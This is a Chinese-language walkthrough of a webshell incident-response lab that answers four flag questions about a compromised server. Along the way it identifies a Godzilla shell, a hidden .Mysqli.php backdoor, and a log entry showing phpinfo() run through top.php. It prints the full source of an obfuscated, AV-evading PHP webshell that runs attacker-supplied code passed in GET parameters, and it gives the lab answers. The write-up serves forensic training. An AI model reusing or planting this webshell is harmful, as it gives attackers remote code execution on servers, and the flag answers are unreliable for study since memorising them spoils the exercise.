靶机账号密码 root xjwebshell
1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
4.黑客免杀马完整路径 md5 flag{md5}1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx}
tar -cvf web.tar /var/www/html
将web服务端打包下载下来
D盾扫描
flag{027ccd04-5065-48b6-a32d-77c704a5e26d}
2.黑客使用的什么工具的shell github地址的md5 flag{md5}
哥斯拉特征
https://github.com/BeichenDream/Godzilla
flag{39392DE3218C333F794BEFEF07AC9257}
3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xxx
可以看出隐藏后门是.Mysqli.php
/var/www/html/include/Db/.Mysqli.php
flag{AEBAC0E58CD6C5FAD1695EE4D1AC1919}
4.黑客免杀马完整路径 md5 flag{md5}
什么是免杀马?
免杀马(免杀病毒或免杀Webshell)是指经过特殊处理和混淆,使其能够避开杀毒软件和安全检测工具识别的恶意软件或后门程序。黑客使用各种技术手段,使恶意代码看起来像是正常代码,从而躲避签名检测和基于规则的安全机制。这种技术通常用于Webshell和其他后门程序,目的是保持对受害系统的隐蔽访问。
通过日志分析可知
top.php?1=phpinfo();
攻击者通过top.php这个文件查看了php版本信息
D盾也可以
<?php$key = "password";//ERsDHgEUC1hI
$fun = base64_decode($_GET['func']);
for($i=0;$i<strlen($fun);$i++){$fun[$i] = $fun[$i]^$key[$i+1&7];
}
$a = "a";
$s = "s";
$c=$a.$s.$_GET["func2"];
$c($fun);这段代码
为什么可以确认是恶意文件?
- 混淆和隐藏:
-
- 使用Base64编码和字符异或操作来混淆代码。这些技术通常用于隐藏恶意代码,避免被直接检测到。
- 动态执行:
-
- 动态生成并调用函数。这种模式允许攻击者通过URL参数传递任意代码并在服务器上执行,具有极大的危险性。
- 外部输入:
-
- 使用
$_GET参数来控制代码行为。通过外部输入来决定代码逻辑,使得攻击者可以远程控制服务器,执行任意PHP代码。
- 使用
/var/www/html/wap/top.php
flag{EEFF2EABFD9B7A6D26FC1A53D3F7D1DE}